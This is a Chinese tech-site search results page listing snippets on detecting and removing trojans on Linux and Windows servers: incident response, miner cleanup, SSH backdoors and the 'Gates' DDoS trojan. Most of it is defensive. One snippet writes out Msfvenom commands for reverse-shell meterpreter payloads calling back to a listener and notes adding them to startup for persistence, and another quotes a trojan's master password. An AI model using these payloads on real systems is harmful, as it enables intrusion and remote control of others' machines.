首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

记一次Linux木马清除过程

前段时间公司发生了一起服务器入侵事件,在此分享给大家也顺便理顺下linux入侵应急响应思路。 一、事件描述 某天监控同事反馈有台机器cpu飙高到2000%,可能机器已经被黑。...然后,结合这两个时间来查找敏感目录中被修改过的系统文件,进行检查修复和清除。...三、总结 首先啰嗦一下,关于linux主机,高危端口真得万万不能全网开放。看了日志后,发现黑客真是时时刻刻在爆破啊。...local/binrpm -Va>rpm.log 3.4 确认是否有异常开机启动项 cat /etc/rc.localchkconfig --list 4.借助工具查杀病毒和...www.clamav.net/download.html) 4.3 查杀webshell cloudwalker(下载地址-http://github.com/chaitin/cloudwalker) 工具用法不再赘述

2.9K21
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    实战矿马:如何清除木马文件(usrgamespower-on)

    本身这个案例很简单,主要分享使用chattr工具的安装方法和简单文件特殊权限清除命令,方便快速处理。...现象 1.CPU占用100% image.png 2.主机安全检测的木马文件/usr/games/power-on,无法清除隔离。...高占用进程停止后,我们发现这些路径下的文件无法直接通过rm -rf删除 这时候就要使用工具chattr,清除一下文件的特殊权限: 安装chattr yum -y install e2fsprogs 使用...chattr -ias "文件名称" ,清除该文件的特殊权限。...查看自启动日志,看看是否还有新增任务,观察三个小时,无新增说明已经清理干净,同时观察CPU是否正常 企业微信截图_16067264337616.png ---- 总结一下 文件若无法正常执行操作,使用chattr工具清除特殊权限后

    1.8K170

    Linux内核级木马与病毒攻防:基础工具介绍

    要想完成一项复杂的任务,工具的作用至关重要。要想在Linux系统上开发或研究木马病毒等特殊程序,我们需要使用一系列强大的开发和调试攻击。本节先介绍几种在Linux系统上极为强大的工具。...第一个当然是gdb了,在Linux上,它是唯一能用于程序调试的利器。...我们后面开发代码或调试分析其他病毒或木马的设计模式和原理时,必须使用gdb作为手术刀,对要研究的病毒和木马进行”剖尸检验“,通过gdb调查木马或病毒的代码设计方法,同时也使用gdb加载恶意代码,研究其运转流程...第二个是objdump,它的作用是将恶意代码所编制成的可执行文件内部信息抽取出来,例如如果病毒或木马最后编译成ELF格式的可执行文件,那么我们可以使用该工具将里面的各种信息展示出来,举个例子,使用C语言写一个...这些工具和命令的更多用法将在后续相关章节中讲解和使用。

    1.5K10

    黑客常用的木马工具

    大家经常会听到“木马”一词。究竟木马是什么东西呢?这篇文章里我会向大家介绍“特洛伊木马”、“特洛伊木马”的使用以及特洛伊木马的防范等。 木马,全称为:特洛伊木马(Trojan Horse)。...然后,给别人善意的提醒对方,教他把木马清除掉! —— 这才是真正黑客:) 关于冰河的万能密码: 2.2版:Can you speak chinese?...如果清除冰河服务端: 方法一: 俗话说,解铃还需系铃人。中了冰河,就用它的控制端来卸载服务端。具体方法: 1、启动“冰河”的控制端程序。...点击“自动卸载”,就将冰河的服务器端清除了。 ? 方法二: 冰河 v1.1 1、打开注册表“Regedit.exe”。(可以在“开始”——“运行”里输入“regedit”。)...然后重新启动Windows,删除于注册表相对应的木马程序。也可以试试“冰河 v1.1”的清除方法。

    1.6K30

    服务器存在SSH木马后门怎么清除和查找

    关于SSH后门木马查杀,那SSH协议其实它是一个加密的网络传输协议,通常咱们使用它作为Linux管理使用,那它用来传输命令界面和远程执行命令,也就是咱们现在看到的这个界面,通常计算机被入侵之后,如果这个计算机是暴露在外网的...我给大家说的是这个文件里可以看到所有的账户 Linux是通过读取这个文件找到账户的,所以所有的账户必须在passwd里边。...但是以这个为后缀的是不能登录的,可以看看最近的登录记录命令为last,看有无可以人员的登录,然后对比下bin目录下的bash有无被替换,然后再看下sshd的进程有无向外自动连接之类的,如果还是找不到服务器中的木马后门的话可以向网站漏洞修复服务商寻求技术支持

    1.4K10

    工具的使用 | Msfvenonm生成木马

    目录 Msfvenom 生成exe木马 在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。...传送门——>Metasploit之Meterpreter 今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。...msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -o ~/Desktop/test2.apk Linux...: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f elf > shell.elf...如图,我们成功拿到了其他主机的shell 对于这个木马,如果我们在获取到某主机的shell后,想要在目标主机建立持续性的后门,我们可以将该木马放到目标主机的开机启动项中,那样,只要该主机启动后,我们就可以连接到该主机了

    1.5K10

    Windows病毒和木马排查工具

    工控系统越来越多被病毒软件和恶意木马攻击,造成很多工控系统运行缓慢,表现症状为操作缓慢,画面切换卡顿,历史曲线和操作面板调用卡顿,检查windows操作系统时候发现cpu并不是很高,内存占用也不多,但硬盘读写很疯狂...今天剑工提供一个windows脚本工具,用来帮助工控用户检查windows系统关键项是否异常,脚本工具叫:windows check tools,文件名wct.bat 首先下载wct.bat到c盘根目录下...最后查看application/system/security三项的事件记录,可以根据时间查看事件的顺序的内容 以上通过此脚本工具可以快速排查病毒/木马对windows系统的入侵。...对于如何安全清除这些木马和病毒,欢迎大家加入剑指工控技术群获取离线清除工具(不同的工控系统需要采用不同的清除工具,防止清除工具对工控系统产生不必要的删除和隔离)

    73810

    Linux应急响应(四):盖茨木马

    0x00 前言 Linux盖茨木马是一类有着丰富历史,隐藏手法巧妙,网络攻击行为显著的DDoS木马,主要恶意特点是具备了后门程序,DDoS攻击的能力,并且会替换常用的系统文件进行伪装。...木马得名于其在变量函数的命名中,大量使用Gates这个单词。分析和清除盖茨木马的过程,可以发现有很多值得去学习和借鉴的地方。...从以上种种行为发现该病毒与“盖茨木马”有点类似,具体技术分析细节详见: Linux平台“盖茨木马”分析 http://www.freebuf.com/articles/system/117823.html...悬镜服务器卫士丨Linux平台“盖茨木马”分析 http://www.sohu.com/a/117926079_515168 手动清除木马过程: 1、简单判断有无木马 #有无下列文件 cat /etc...命令替换: rpm2cpio 包全名 | cpio -idv .文件绝对路径 rpm包中文件提取 Rpm2cpio 将rpm包转换为cpio格式的命令 Cpio 是一个标准工具,它用于创建软件档案文件和从档案文件中提取文件

    2K41
    领券